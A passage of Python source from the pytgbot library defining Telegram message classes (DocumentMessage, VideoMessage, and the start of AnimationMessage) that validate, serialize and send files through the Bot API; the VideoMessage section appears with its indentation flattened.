:param thumb: Thumbnail of the file sent; can be ignored if thumbnail generation for the file is supported server-side. The thumbnail should be in JPEG format and less than 200 kB in size. A thumbnail's width and height should not exceed 320. Ignored if the file is not uploaded using multipart/form-data. Thumbnails can't be reused and can be only uploaded as a new file, so you can pass "attach://<file_attach_name>" if the thumbnail was uploaded using multipart/form-data under <file_attach_name>. More info on Sending Files »
:type thumb: pytgbot.api_types.sendable.files.InputFile | str|unicode
:param caption: Document caption (may also be used when resending documents by file_id), 0-1024 characters after entities parsing
:type caption: str|unicode
:param parse_mode: Mode for parsing entities in the document caption. See formatting options for more details.
:type parse_mode: str|unicode
:param caption_entities: A JSON-serialized list of special entities that appear in the caption, which can be specified instead of parse_mode
:type caption_entities: list of pytgbot.api_types.receivable.media.MessageEntity
:param disable_content_type_detection: Disables automatic server-side content type detection for files uploaded using multipart/form-data
:type disable_content_type_detection: bool
:param disable_notification: Sends the message silently. Users will receive a notification with no sound.
:type disable_notification: bool
:param allow_sending_without_reply: Pass True, if the message should be sent even if the specified replied-to message is not found
:type allow_sending_without_reply: bool
:param reply_markup: Additional interface options. A JSON-serialized object for an inline keyboard, custom reply keyboard, instructions to remove reply keyboard or to force a reply from the user.
:type reply_markup: pytgbot.api_types.sendable.reply_markup.InlineKeyboardMarkup | pytgbot.api_types.sendable.reply_markup.ReplyKeyboardMarkup | pytgbot.api_types.sendable.reply_markup.ReplyKeyboardRemove | pytgbot.api_types.sendable.reply_markup.ForceReply
"""
def __init__(self, document, receiver=None, reply_id=DEFAULT_MESSAGE_ID, thumb=None, caption=None, parse_mode=None, caption_entities=None, disable_content_type_detection=None, disable_notification=None, allow_sending_without_reply=None, reply_markup=None):
    """
    Use this method to send general files. On success, the sent Message is returned. Bots can currently send files of any type of up to 50 MB in size, this limit may be changed in the future.

    https://core.telegram.org/bots/api#senddocument

    :param document: File to send: a file_id string, an HTTP URL string, or a new InputFile upload.
    :type  document: pytgbot.api_types.sendable.files.InputFile | str|unicode

    :param receiver: Overwrites the receiver, which automatically is the chat_id in group chats and the from_peer id in private conversations.
    :type  receiver: str|unicode | int

    :param reply_id: Overwrites the `reply_to_message_id`, which automatically is the message triggering the bot.
    :type  reply_id: DEFAULT_MESSAGE_ID | int

    :param thumb: Thumbnail of the file sent (JPEG, less than 200 kB, max 320x320); ignored unless the file is uploaded using multipart/form-data.
    :type  thumb: pytgbot.api_types.sendable.files.InputFile | str|unicode

    :param caption: Document caption, 0-1024 characters after entities parsing.
    :type  caption: str|unicode

    :param parse_mode: Mode for parsing entities in the document caption.
    :type  parse_mode: str|unicode

    :param caption_entities: A list of special entities that appear in the caption; can be specified instead of parse_mode.
    :type  caption_entities: list of pytgbot.api_types.receivable.media.MessageEntity

    :param disable_content_type_detection: Disables automatic server-side content type detection for files uploaded using multipart/form-data.
    :type  disable_content_type_detection: bool

    :param disable_notification: Sends the message silently (notification with no sound).
    :type  disable_notification: bool

    :param allow_sending_without_reply: Send even if the specified replied-to message is not found.
    :type  allow_sending_without_reply: bool

    :param reply_markup: Additional interface options: inline keyboard, custom reply keyboard, keyboard removal, or force reply.
    :type  reply_markup: pytgbot.api_types.sendable.reply_markup.InlineKeyboardMarkup | pytgbot.api_types.sendable.reply_markup.ReplyKeyboardMarkup | pytgbot.api_types.sendable.reply_markup.ReplyKeyboardRemove | pytgbot.api_types.sendable.reply_markup.ForceReply
    """
    super(DocumentMessage, self).__init__()
    from pytgbot.api_types.sendable.files import InputFile
    from pytgbot.api_types.sendable.reply_markup import (
        ForceReply, InlineKeyboardMarkup, ReplyKeyboardMarkup, ReplyKeyboardRemove,
    )

    # Validate all parameters up front, then store them.
    assert_type_or_raise(document, InputFile, unicode_type, parameter_name="document")
    assert_type_or_raise(receiver, None, unicode_type, int, parameter_name="receiver")
    assert_type_or_raise(reply_id, None, DEFAULT_MESSAGE_ID, int, parameter_name="reply_id")
    assert_type_or_raise(thumb, None, InputFile, unicode_type, parameter_name="thumb")
    assert_type_or_raise(caption, None, unicode_type, parameter_name="caption")
    assert_type_or_raise(parse_mode, None, unicode_type, parameter_name="parse_mode")
    assert_type_or_raise(caption_entities, None, list, parameter_name="caption_entities")
    assert_type_or_raise(disable_content_type_detection, None, bool, parameter_name="disable_content_type_detection")
    assert_type_or_raise(disable_notification, None, bool, parameter_name="disable_notification")
    assert_type_or_raise(allow_sending_without_reply, None, bool, parameter_name="allow_sending_without_reply")
    assert_type_or_raise(reply_markup, None, InlineKeyboardMarkup, ReplyKeyboardMarkup, ReplyKeyboardRemove, ForceReply, parameter_name="reply_markup")

    self.document = document
    self.receiver = receiver
    self.reply_id = reply_id
    self.thumb = thumb
    self.caption = caption
    self.parse_mode = parse_mode
    self.caption_entities = caption_entities
    self.disable_content_type_detection = disable_content_type_detection
    self.disable_notification = disable_notification
    self.allow_sending_without_reply = allow_sending_without_reply
    self.reply_markup = reply_markup

    # custom variable for message chaining
    self._next_msg = None
# end def __init__
def actual_send(self, sender: PytgbotApiBot, *, ignore_reply: bool = False) -> PytgbotApiMessage:
    """
    Send the message via pytgbot.

    :param sender: The bot instance to send with.
    :type  sender: pytgbot.bot.Bot

    :param ignore_reply: If we should not include the `reply_to` parameter, because that already failed.
    :type  ignore_reply: bool

    :rtype: PytgbotApiMessage
    """
    return sender.send_document(
        document=self.document,
        chat_id=self.receiver,
        # Bug fix: honor ignore_reply — drop the reply target when replying already failed once.
        reply_to_message_id=self.reply_id if not ignore_reply else None,
        thumb=self.thumb,
        caption=self.caption,
        parse_mode=self.parse_mode,
        caption_entities=self.caption_entities,
        disable_content_type_detection=self.disable_content_type_detection,
        disable_notification=self.disable_notification,
        allow_sending_without_reply=self.allow_sending_without_reply,
        reply_markup=self.reply_markup,
    )
# end def actual_send
def to_array(self):
    """
    Serializes this DocumentMessage to a dictionary.

    Only fields which are actually set (not None) are written, so the
    constructor defaults no longer make serialization raise TypeError
    or emit bogus values like ``u(None)``.

    :return: dictionary representation of this object.
    :rtype: dict
    """
    from pytgbot.api_types.sendable.files import InputFile
    from pytgbot.api_types.sendable.reply_markup import ForceReply
    from pytgbot.api_types.sendable.reply_markup import InlineKeyboardMarkup
    from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardMarkup
    from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardRemove
    array = super(DocumentMessage, self).to_array()

    # document is the only required field.
    if isinstance(self.document, InputFile):
        array['document'] = self.document.to_array()  # type InputFile
    elif isinstance(self.document, str):
        array['document'] = u(self.document)  # py2: type unicode, py3: type str
    else:
        raise TypeError('Unknown type, must be one of InputFile, str.')
    # end if

    # Everything below is optional: skip unset (None) values instead of raising.
    if self.receiver is not None:
        if isinstance(self.receiver, str):
            array['chat_id'] = u(self.receiver)  # py2: type unicode, py3: type str
        elif isinstance(self.receiver, int):
            array['chat_id'] = int(self.receiver)  # type int
        else:
            raise TypeError('Unknown type, must be one of str, int.')
        # end if
    # end if
    if self.reply_id is not None:
        if isinstance(self.reply_id, DEFAULT_MESSAGE_ID):
            array['reply_to_message_id'] = DEFAULT_MESSAGE_ID(self.reply_id)  # type DEFAULT_MESSAGE_ID
        elif isinstance(self.reply_id, int):
            array['reply_to_message_id'] = int(self.reply_id)  # type int
        else:
            raise TypeError('Unknown type, must be one of DEFAULT_MESSAGE_ID, int.')
        # end if
    # end if
    if self.thumb is not None:
        if isinstance(self.thumb, InputFile):
            array['thumb'] = self.thumb.to_array()  # type InputFile
        elif isinstance(self.thumb, str):
            array['thumb'] = u(self.thumb)  # py2: type unicode, py3: type str
        else:
            raise TypeError('Unknown type, must be one of InputFile, str.')
        # end if
    # end if
    if self.caption is not None:
        array['caption'] = u(self.caption)  # py2: type unicode, py3: type str
    # end if
    if self.parse_mode is not None:
        array['parse_mode'] = u(self.parse_mode)  # py2: type unicode, py3: type str
    # end if
    if self.caption_entities is not None:
        # NOTE(review): called as a class-level helper; confirm _as_array is static on PytgbotApiBot.
        array['caption_entities'] = PytgbotApiBot._as_array(self.caption_entities)  # type list of MessageEntity
    # end if
    if self.disable_content_type_detection is not None:
        array['disable_content_type_detection'] = bool(self.disable_content_type_detection)  # type bool
    # end if
    if self.disable_notification is not None:
        array['disable_notification'] = bool(self.disable_notification)  # type bool
    # end if
    if self.allow_sending_without_reply is not None:
        array['allow_sending_without_reply'] = bool(self.allow_sending_without_reply)  # type bool
    # end if
    if self.reply_markup is not None:
        if isinstance(self.reply_markup, (InlineKeyboardMarkup, ReplyKeyboardMarkup, ReplyKeyboardRemove, ForceReply)):
            array['reply_markup'] = self.reply_markup.to_array()
        else:
            raise TypeError('Unknown type, must be one of InlineKeyboardMarkup, ReplyKeyboardMarkup, ReplyKeyboardRemove, ForceReply.')
        # end if
    # end if
    return array
# end def to_array
@staticmethod
def validate_array(array):
    """
    Builds a new array with valid values for the DocumentMessage constructor.

    :return: new array with valid values
    :rtype: dict
    """
    assert_type_or_raise(array, dict, parameter_name="array")
    from pytgbot.api_types.receivable.media import MessageEntity
    from pytgbot.api_types.sendable.files import InputFile
    from pytgbot.api_types.sendable.reply_markup import (
        ForceReply, InlineKeyboardMarkup, ReplyKeyboardMarkup, ReplyKeyboardRemove,
    )
    data = super(DocumentMessage, DocumentMessage).validate_array(array)

    document = array.get('document')
    if isinstance(document, InputFile):
        data['document'] = InputFile.from_array(document)
    elif isinstance(document, str):
        data['document'] = u(document)
    else:
        raise TypeError('Unknown type, must be one of InputFile, str.')
    # end if

    chat_id = array.get('chat_id')
    if chat_id is None:
        data['receiver'] = None
    elif isinstance(chat_id, str):
        data['receiver'] = u(chat_id)
    elif isinstance(chat_id, int):
        data['receiver'] = int(chat_id)
    else:
        raise TypeError('Unknown type, must be one of str, int or None.')
    # end if

    reply_to = array.get('reply_to_message_id')
    if reply_to is None:
        data['reply_id'] = None
    elif isinstance(reply_to, DEFAULT_MESSAGE_ID):
        # NOTE(review): stores the sentinel itself, not the incoming value —
        # preserved as-is; confirm this is the intended sentinel semantics.
        data['reply_id'] = DEFAULT_MESSAGE_ID
    elif isinstance(reply_to, int):
        data['reply_id'] = int(reply_to)
    else:
        raise TypeError('Unknown type, must be one of DEFAULT_MESSAGE_ID, int or None.')
    # end if

    thumb = array.get('thumb')
    if thumb is None:
        data['thumb'] = None
    elif isinstance(thumb, InputFile):
        data['thumb'] = InputFile.from_array(thumb)
    elif isinstance(thumb, str):
        data['thumb'] = u(thumb)
    else:
        raise TypeError('Unknown type, must be one of InputFile, str or None.')
    # end if

    data['caption'] = u(array.get('caption')) if array.get('caption') is not None else None
    data['parse_mode'] = u(array.get('parse_mode')) if array.get('parse_mode') is not None else None
    data['caption_entities'] = MessageEntity.from_array_list(array.get('caption_entities'), list_level=1) if array.get('caption_entities') is not None else None
    data['disable_content_type_detection'] = bool(array.get('disable_content_type_detection')) if array.get('disable_content_type_detection') is not None else None
    data['disable_notification'] = bool(array.get('disable_notification')) if array.get('disable_notification') is not None else None
    data['allow_sending_without_reply'] = bool(array.get('allow_sending_without_reply')) if array.get('allow_sending_without_reply') is not None else None

    reply_markup = array.get('reply_markup')
    if reply_markup is None:
        data['reply_markup'] = None
    elif isinstance(reply_markup, InlineKeyboardMarkup):
        data['reply_markup'] = InlineKeyboardMarkup.from_array(reply_markup)
    elif isinstance(reply_markup, ReplyKeyboardMarkup):
        data['reply_markup'] = ReplyKeyboardMarkup.from_array(reply_markup)
    elif isinstance(reply_markup, ReplyKeyboardRemove):
        data['reply_markup'] = ReplyKeyboardRemove.from_array(reply_markup)
    elif isinstance(reply_markup, ForceReply):
        data['reply_markup'] = ForceReply.from_array(reply_markup)
    else:
        raise TypeError('Unknown type, must be one of InlineKeyboardMarkup, ReplyKeyboardMarkup, ReplyKeyboardRemove, ForceReply or None.')
    # end if
    return data
# end def validate_array
@staticmethod
def from_array(array):
    """
    Deserialize a new DocumentMessage from a given dictionary.

    :return: new DocumentMessage instance.
    :rtype: DocumentMessage
    """
    # None or an empty dict means there is nothing to build.
    if not array:
        return None
    # end if
    return DocumentMessage(**DocumentMessage.validate_array(array))
# end def from_array
def __str__(self):
    """
    Implements `str(documentmessage_instance)`
    """
    field_names = (
        "document", "receiver", "reply_id", "thumb", "caption", "parse_mode",
        "caption_entities", "disable_content_type_detection", "disable_notification",
        "allow_sending_without_reply", "reply_markup",
    )
    rendered = ", ".join(
        "{name}={value!r}".format(name=name, value=getattr(self, name))
        for name in field_names
    )
    return "DocumentMessage({rendered})".format(rendered=rendered)
# end def __str__
def __repr__(self):
    """
    Implements `repr(documentmessage_instance)`
    """
    attrs = (
        "document", "receiver", "reply_id", "thumb", "caption", "parse_mode",
        "caption_entities", "disable_content_type_detection", "disable_notification",
        "allow_sending_without_reply", "reply_markup",
    )
    inner = ", ".join("%s=%r" % (attr, getattr(self, attr)) for attr in attrs)
    return "DocumentMessage(" + inner + ")"
# end def __repr__
def __contains__(self, key):
    """
    Implements `"key" in documentmessage_instance`
    """
    known_keys = (
        "document", "receiver", "reply_id", "thumb", "caption", "parse_mode",
        "caption_entities", "disable_content_type_detection", "disable_notification",
        "allow_sending_without_reply", "reply_markup",
    )
    # Unknown keys are never "in"; known keys only count when set to a truthy value.
    if key not in known_keys:
        return False
    # end if
    return hasattr(self, key) and bool(getattr(self, key, None))
# end def __contains__
# end class DocumentMessage
class VideoMessage(ReturnableMessageBase):
"""
Use this method to send video files, Telegram clients support mp4 videos (other formats may be sent as Document). On success, the sent Message is returned. Bots can currently send video files of up to 50 MB in size, this limit may be changed in the future.
https://core.telegram.org/bots/api#sendvideo
Parameters:
:param video: Video to send. Pass a file_id as String to send a video that exists on the Telegram servers (recommended), pass an HTTP URL as a String for Telegram to get a video from the Internet, or upload a new video using multipart/form-data. More info on Sending Files »
:type video: pytgbot.api_types.sendable.files.InputFile | str|unicode
Optional keyword parameters:
:param receiver: Set if you want to overwrite the receiver, which automatically is the chat_id in group chats, and the from_peer id in private conversations.
:type receiver: str|unicode | int
:param reply_id: Set if you want to overwrite the `reply_to_message_id`, which automatically is the message triggering the bot.
:type reply_id: DEFAULT_MESSAGE_ID | int
:param duration: Duration of sent video in seconds
:type duration: int
:param width: Video width
:type width: int
:param height: Video height
:type height: int
:param thumb: Thumbnail of the file sent; can be ignored if thumbnail generation for the file is supported server-side. The thumbnail should be in JPEG format and less than 200 kB in size. A thumbnail's width and height should not exceed 320. Ignored if the file is not uploaded using multipart/form-data. Thumbnails can't be reused and can be only uploaded as a new file, so you can pass "attach://<file_attach_name>" if the thumbnail was uploaded using multipart/form-data under <file_attach_name>. More info on Sending Files »
:type thumb: pytgbot.api_types.sendable.files.InputFile | str|unicode
:param caption: Video caption (may also be used when resending videos by file_id), 0-1024 characters after entities parsing
:type caption: str|unicode
:param parse_mode: Mode for parsing entities in the video caption. See formatting options for more details.
:type parse_mode: str|unicode
:param caption_entities: A JSON-serialized list of special entities that appear in the caption, which can be specified instead of parse_mode
:type caption_entities: list of pytgbot.api_types.receivable.media.MessageEntity
:param supports_streaming: Pass True, if the uploaded video is suitable for streaming
:type supports_streaming: bool
:param disable_notification: Sends the message silently. Users will receive a notification with no sound.
:type disable_notification: bool
:param allow_sending_without_reply: Pass True, if the message should be sent even if the specified replied-to message is not found
:type allow_sending_without_reply: bool
:param reply_markup: Additional interface options. A JSON-serialized object for an inline keyboard, custom reply keyboard, instructions to remove reply keyboard or to force a reply from the user.
:type reply_markup: pytgbot.api_types.sendable.reply_markup.InlineKeyboardMarkup | pytgbot.api_types.sendable.reply_markup.ReplyKeyboardMarkup | pytgbot.api_types.sendable.reply_markup.ReplyKeyboardRemove | pytgbot.api_types.sendable.reply_markup.ForceReply
"""
def __init__(self, video, receiver=None, reply_id=DEFAULT_MESSAGE_ID, duration=None, width=None, height=None, thumb=None, caption=None, parse_mode=None, caption_entities=None, supports_streaming=None, disable_notification=None, allow_sending_without_reply=None, reply_markup=None):
"""
Use this method to send video files, Telegram clients support mp4 videos (other formats may be sent as Document). On success, the sent Message is returned. Bots can currently send video files of up to 50 MB in size, this limit may be changed in the future.
https://core.telegram.org/bots/api#sendvideo
Parameters:
:param video: Video to send. Pass a file_id as String to send a video that exists on the Telegram servers (recommended), pass an HTTP URL as a String for Telegram to get a video from the Internet, or upload a new video using multipart/form-data. More info on Sending Files »
:type video: pytgbot.api_types.sendable.files.InputFile | str|unicode
Optional keyword parameters:
:param receiver: Set if you want to overwrite the receiver, which automatically is the chat_id in group chats, and the from_peer id in private conversations.
:type receiver: str|unicode | int
:param reply_id: Set if you want to overwrite the `reply_to_message_id`, which automatically is the message triggering the bot.
:type reply_id: DEFAULT_MESSAGE_ID | int
:param duration: Duration of sent video in seconds
:type duration: int
:param width: Video width
:type width: int
:param height: Video height
:type height: int
:param thumb: Thumbnail of the file sent; can be ignored if thumbnail generation for the file is supported server-side. The thumbnail should be in JPEG format and less than 200 kB in size. A thumbnail's width and height should not exceed 320. Ignored if the file is not uploaded using multipart/form-data. Thumbnails can't be reused and can be only uploaded as a new file, so you can pass "attach://<file_attach_name>" if the thumbnail was uploaded using multipart/form-data under <file_attach_name>. More info on Sending Files »
:type thumb: pytgbot.api_types.sendable.files.InputFile | str|unicode
:param caption: Video caption (may also be used when resending videos by file_id), 0-1024 characters after entities parsing
:type caption: str|unicode
:param parse_mode: Mode for parsing entities in the video caption. See formatting options for more details.
:type parse_mode: str|unicode
:param caption_entities: A JSON-serialized list of special entities that appear in the caption, which can be specified instead of parse_mode
:type caption_entities: list of pytgbot.api_types.receivable.media.MessageEntity
:param supports_streaming: Pass True, if the uploaded video is suitable for streaming
:type supports_streaming: bool
:param disable_notification: Sends the message silently. Users will receive a notification with no sound.
:type disable_notification: bool
:param allow_sending_without_reply: Pass True, if the message should be sent even if the specified replied-to message is not found
:type allow_sending_without_reply: bool
:param reply_markup: Additional interface options. A JSON-serialized object for an inline keyboard, custom reply keyboard, instructions to remove reply keyboard or to force a reply from the user.
:type reply_markup: pytgbot.api_types.sendable.reply_markup.InlineKeyboardMarkup | pytgbot.api_types.sendable.reply_markup.ReplyKeyboardMarkup | pytgbot.api_types.sendable.reply_markup.ReplyKeyboardRemove | pytgbot.api_types.sendable.reply_markup.ForceReply
"""
super(VideoMessage, self).__init__()
from pytgbot.api_types.receivable.media import MessageEntity
from pytgbot.api_types.sendable.files import InputFile
from pytgbot.api_types.sendable.reply_markup import ForceReply
from pytgbot.api_types.sendable.reply_markup import InlineKeyboardMarkup
from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardMarkup
from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardRemove
assert_type_or_raise(video, InputFile, unicode_type, parameter_name="video")
self.video = video
assert_type_or_raise(receiver, None, unicode_type, int, parameter_name="receiver")
self.receiver = receiver
assert_type_or_raise(reply_id, None, DEFAULT_MESSAGE_ID, int, parameter_name="reply_id")
self.reply_id = reply_id
assert_type_or_raise(duration, None, int, parameter_name="duration")
self.duration = duration
assert_type_or_raise(width, None, int, parameter_name="width")
self.width = width
assert_type_or_raise(height, None, int, parameter_name="height")
self.height = height
assert_type_or_raise(thumb, None, InputFile, unicode_type, parameter_name="thumb")
self.thumb = thumb
assert_type_or_raise(caption, None, unicode_type, parameter_name="caption")
self.caption = caption
assert_type_or_raise(parse_mode, None, unicode_type, parameter_name="parse_mode")
self.parse_mode = parse_mode
assert_type_or_raise(caption_entities, None, list, parameter_name="caption_entities")
self.caption_entities = caption_entities
assert_type_or_raise(supports_streaming, None, bool, parameter_name="supports_streaming")
self.supports_streaming = supports_streaming
assert_type_or_raise(disable_notification, None, bool, parameter_name="disable_notification")
self.disable_notification = disable_notification
assert_type_or_raise(allow_sending_without_reply, None, bool, parameter_name="allow_sending_without_reply")
self.allow_sending_without_reply = allow_sending_without_reply
assert_type_or_raise(reply_markup, None, InlineKeyboardMarkup, ReplyKeyboardMarkup, ReplyKeyboardRemove, ForceReply, parameter_name="reply_markup")
self.reply_markup = reply_markup
# custom variable for message chaining
self._next_msg = None
# end def __init__
def actual_send(self, sender: PytgbotApiBot, *, ignore_reply: bool = False) -> PytgbotApiMessage:
"""
Send the message via pytgbot.
:param sender: The bot instance to send with.
:type sender: pytgbot.bot.Bot
:param ignore_reply: If we should not include the the `reply_to` parameter, because that already failed.
:type ignore_reply: bool
:rtype: PytgbotApiMessage
"""
return sender.send_video(
video=self.video,
chat_id=self.receiver,
reply_to_message_id=self.reply_id,
duration=self.duration,
width=self.width,
height=self.height,
thumb=self.thumb,
caption=self.caption,
parse_mode=self.parse_mode,
caption_entities=self.caption_entities,
supports_streaming=self.supports_streaming,
disable_notification=self.disable_notification,
allow_sending_without_reply=self.allow_sending_without_reply,
reply_markup=self.reply_markup,
)
# end def send
def to_array(self):
"""
Serializes this VideoMessage to a dictionary.
:return: dictionary representation of this object.
:rtype: dict
"""
from pytgbot.api_types.receivable.media import MessageEntity
from pytgbot.api_types.sendable.files import InputFile
from pytgbot.api_types.sendable.reply_markup import ForceReply
from pytgbot.api_types.sendable.reply_markup import InlineKeyboardMarkup
from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardMarkup
from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardRemove
array = super(VideoMessage, self).to_array()
if isinstance(self.video, InputFile):
array['video'] = self.video.to_array() # type InputFile
elif isinstance(self.video, str):
array['video'] = u(self.video) # py2: type unicode, py3: type str
else:
raise TypeError('Unknown type, must be one of InputFile, str.')
# end if
if isinstance(self.receiver, str):
array['chat_id'] = u(self.receiver) # py2: type unicode, py3: type str
elif isinstance(self.receiver, int):
array['chat_id'] = int(self.receiver) # type int
else:
raise TypeError('Unknown type, must be one of str, int.')
# end if
if isinstance(self.reply_id, DEFAULT_MESSAGE_ID):
array['reply_to_message_id'] = DEFAULT_MESSAGE_ID(self.reply_id) # type DEFAULT_MESSAGE_ID
elif isinstance(self.reply_id, int):
array['reply_to_message_id'] = int(self.reply_id) # type int
else:
raise TypeError('Unknown type, must be one of DEFAULT_MESSAGE_ID, int.')
# end if
array['duration'] = int(self.duration) # type int
array['width'] = int(self.width) # type int
array['height'] = int(self.height) # type int
if isinstance(self.thumb, InputFile):
array['thumb'] = self.thumb.to_array() # type InputFile
elif isinstance(self.thumb, str):
array['thumb'] = u(self.thumb) # py2: type unicode, py3: type str
else:
raise TypeError('Unknown type, must be one of InputFile, str.')
# end if
array['caption'] = u(self.caption) # py2: type unicode, py3: type str
array['parse_mode'] = u(self.parse_mode) # py2: type unicode, py3: type str
array['caption_entities'] = PytgbotApiBot._as_array(self.caption_entities) # type list of MessageEntity
array['supports_streaming'] = bool(self.supports_streaming) # type bool
array['disable_notification'] = bool(self.disable_notification) # type bool
array['allow_sending_without_reply'] = bool(self.allow_sending_without_reply) # type bool
if isinstance(self.reply_markup, InlineKeyboardMarkup):
array['reply_markup'] = self.reply_markup.to_array() # type InlineKeyboardMarkup
elif isinstance(self.reply_markup, ReplyKeyboardMarkup):
array['reply_markup'] = self.reply_markup.to_array() # type ReplyKeyboardMarkup
elif isinstance(self.reply_markup, ReplyKeyboardRemove):
array['reply_markup'] = self.reply_markup.to_array() # type ReplyKeyboardRemove
elif isinstance(self.reply_markup, ForceReply):
array['reply_markup'] = self.reply_markup.to_array() # type ForceReply
else:
raise TypeError('Unknown type, must be one of InlineKeyboardMarkup, ReplyKeyboardMarkup, ReplyKeyboardRemove, ForceReply.')
# end if
return array
# end def to_array
@staticmethod
def validate_array(array):
"""
Builds a new array with valid values for the VideoMessage constructor.
:return: new array with valid values
:rtype: dict
"""
assert_type_or_raise(array, dict, parameter_name="array")
from pytgbot.api_types.receivable.media import MessageEntity
from pytgbot.api_types.sendable.files import InputFile
from pytgbot.api_types.sendable.reply_markup import ForceReply
from pytgbot.api_types.sendable.reply_markup import InlineKeyboardMarkup
from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardMarkup
from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardRemove
data = super(VideoMessage, VideoMessage).validate_array(array)
if isinstance(array.get('video'), InputFile):
data['video'] = InputFile.from_array(array.get('video'))
elif isinstance(array.get('video'), str):
data['video'] = u(array.get('video'))
else:
raise TypeError('Unknown type, must be one of InputFile, str.')
# end if
if array.get('chat_id') is None:
data['receiver'] = None
elif isinstance(array.get('chat_id'), str):
data['receiver'] = u(array.get('chat_id'))
elif isinstance(array.get('chat_id'), int):
data['receiver'] = int(array.get('chat_id'))
else:
raise TypeError('Unknown type, must be one of str, int or None.')
# end if
if array.get('reply_to_message_id') is None:
data['reply_id'] = None
elif isinstance(array.get('reply_to_message_id'), DEFAULT_MESSAGE_ID):
data['reply_id'] = DEFAULT_MESSAGE_ID
elif isinstance(array.get('reply_to_message_id'), int):
data['reply_id'] = int(array.get('reply_to_message_id'))
else:
raise TypeError('Unknown type, must be one of DEFAULT_MESSAGE_ID, int or None.')
# end if
data['duration'] = int(array.get('duration')) if array.get('duration') is not None else None
data['width'] = int(array.get('width')) if array.get('width') is not None else None
data['height'] = int(array.get('height')) if array.get('height') is not None else None
if array.get('thumb') is None:
data['thumb'] = None
elif isinstance(array.get('thumb'), InputFile):
data['thumb'] = InputFile.from_array(array.get('thumb'))
elif isinstance(array.get('thumb'), str):
data['thumb'] = u(array.get('thumb'))
else:
raise TypeError('Unknown type, must be one of InputFile, str or None.')
# end if
data['caption'] = u(array.get('caption')) if array.get('caption') is not None else None
data['parse_mode'] = u(array.get('parse_mode')) if array.get('parse_mode') is not None else None
data['caption_entities'] = MessageEntity.from_array_list(array.get('caption_entities'), list_level=1) if array.get('caption_entities') is not None else None
data['supports_streaming'] = bool(array.get('supports_streaming')) if array.get('supports_streaming') is not None else None
data['disable_notification'] = bool(array.get('disable_notification')) if array.get('disable_notification') is not None else None
data['allow_sending_without_reply'] = bool(array.get('allow_sending_without_reply')) if array.get('allow_sending_without_reply') is not None else None
if array.get('reply_markup') is None:
data['reply_markup'] = None
elif isinstance(array.get('reply_markup'), InlineKeyboardMarkup):
data['reply_markup'] = InlineKeyboardMarkup.from_array(array.get('reply_markup'))
elif isinstance(array.get('reply_markup'), ReplyKeyboardMarkup):
data['reply_markup'] = ReplyKeyboardMarkup.from_array(array.get('reply_markup'))
elif isinstance(array.get('reply_markup'), ReplyKeyboardRemove):
data['reply_markup'] = ReplyKeyboardRemove.from_array(array.get('reply_markup'))
elif isinstance(array.get('reply_markup'), ForceReply):
data['reply_markup'] = ForceReply.from_array(array.get('reply_markup'))
else:
raise TypeError('Unknown type, must be one of InlineKeyboardMarkup, ReplyKeyboardMarkup, ReplyKeyboardRemove, ForceReply or None.')
# end if
return data
# end def validate_array
@staticmethod
def from_array(array):
"""
Deserialize a new VideoMessage from a given dictionary.
:return: new VideoMessage instance.
:rtype: VideoMessage
"""
if not array: # None or {}
return None
# end if
data = VideoMessage.validate_array(array)
return VideoMessage(**data)
# end def from_array
def __str__(self):
"""
Implements `str(videomessage_instance)`
"""
return "VideoMessage(video={self.video!r}, receiver={self.receiver!r}, reply_id={self.reply_id!r}, duration={self.duration!r}, width={self.width!r}, height={self.height!r}, thumb={self.thumb!r}, caption={self.caption!r}, parse_mode={self.parse_mode!r}, caption_entities={self.caption_entities!r}, supports_streaming={self.supports_streaming!r}, disable_notification={self.disable_notification!r}, allow_sending_without_reply={self.allow_sending_without_reply!r}, reply_markup={self.reply_markup!r})".format(self=self)
# end def __str__
def __repr__(self):
    """
    Implements `repr(videomessage_instance)`.

    Lists every constructor field with its `repr()` value.
    """
    return (
        "VideoMessage("
        "video={self.video!r}, receiver={self.receiver!r}, reply_id={self.reply_id!r}, "
        "duration={self.duration!r}, width={self.width!r}, height={self.height!r}, "
        "thumb={self.thumb!r}, caption={self.caption!r}, parse_mode={self.parse_mode!r}, "
        "caption_entities={self.caption_entities!r}, supports_streaming={self.supports_streaming!r}, "
        "disable_notification={self.disable_notification!r}, "
        "allow_sending_without_reply={self.allow_sending_without_reply!r}, "
        "reply_markup={self.reply_markup!r})"
    ).format(self=self)
# end def __repr__
def __contains__(self, key):
    """
    Implements `"key" in videomessage_instance`.

    True only when `key` names a known field AND that field is set to a truthy value.
    """
    known_fields = (
        "video", "receiver", "reply_id", "duration", "width", "height",
        "thumb", "caption", "parse_mode", "caption_entities",
        "supports_streaming", "disable_notification",
        "allow_sending_without_reply", "reply_markup",
    )
    if key not in known_fields:
        return False
    # end if
    return hasattr(self, key) and bool(getattr(self, key, None))
# end def __contains__
# end class VideoMessage
class AnimationMessage(ReturnableMessageBase):
    """
    Use this method to send animation files (GIF or H.264/MPEG-4 AVC video without sound). On success, the sent Message is returned. Bots can currently send animation files of up to 50 MB in size, this limit may be changed in the future.

    https://core.telegram.org/bots/api#sendanimation

    Parameters:

    :param animation: Animation to send. Pass a file_id as String to send an animation that exists on the Telegram servers (recommended), pass an HTTP URL as a String for Telegram to get an animation from the Internet, or upload a new animation using multipart/form-data. More info on Sending Files »
    :type  animation: pytgbot.api_types.sendable.files.InputFile | str|unicode

    Optional keyword parameters:

    :param receiver: Set if you want to overwrite the receiver, which automatically is the chat_id in group chats, and the from_peer id in private conversations.
    :type  receiver: str|unicode | int

    :param reply_id: Set if you want to overwrite the `reply_to_message_id`, which automatically is the message triggering the bot.
    :type  reply_id: DEFAULT_MESSAGE_ID | int

    :param duration: Duration of sent animation in seconds
    :type  duration: int

    :param width: Animation width
    :type  width: int

    :param height: Animation height
    :type  height: int

    :param thumb: Thumbnail of the file sent; can be ignored if thumbnail generation for the file is supported server-side. The thumbnail should be in JPEG format and less than 200 kB in size. A thumbnail's width and height should not exceed 320. Ignored if the file is not uploaded using multipart/form-data. Thumbnails can't be reused and can be only uploaded as a new file, so you can pass "attach://<file_attach_name>" if the thumbnail was uploaded using multipart/form-data under <file_attach_name>. More info on Sending Files »
    :type  thumb: pytgbot.api_types.sendable.files.InputFile | str|unicode

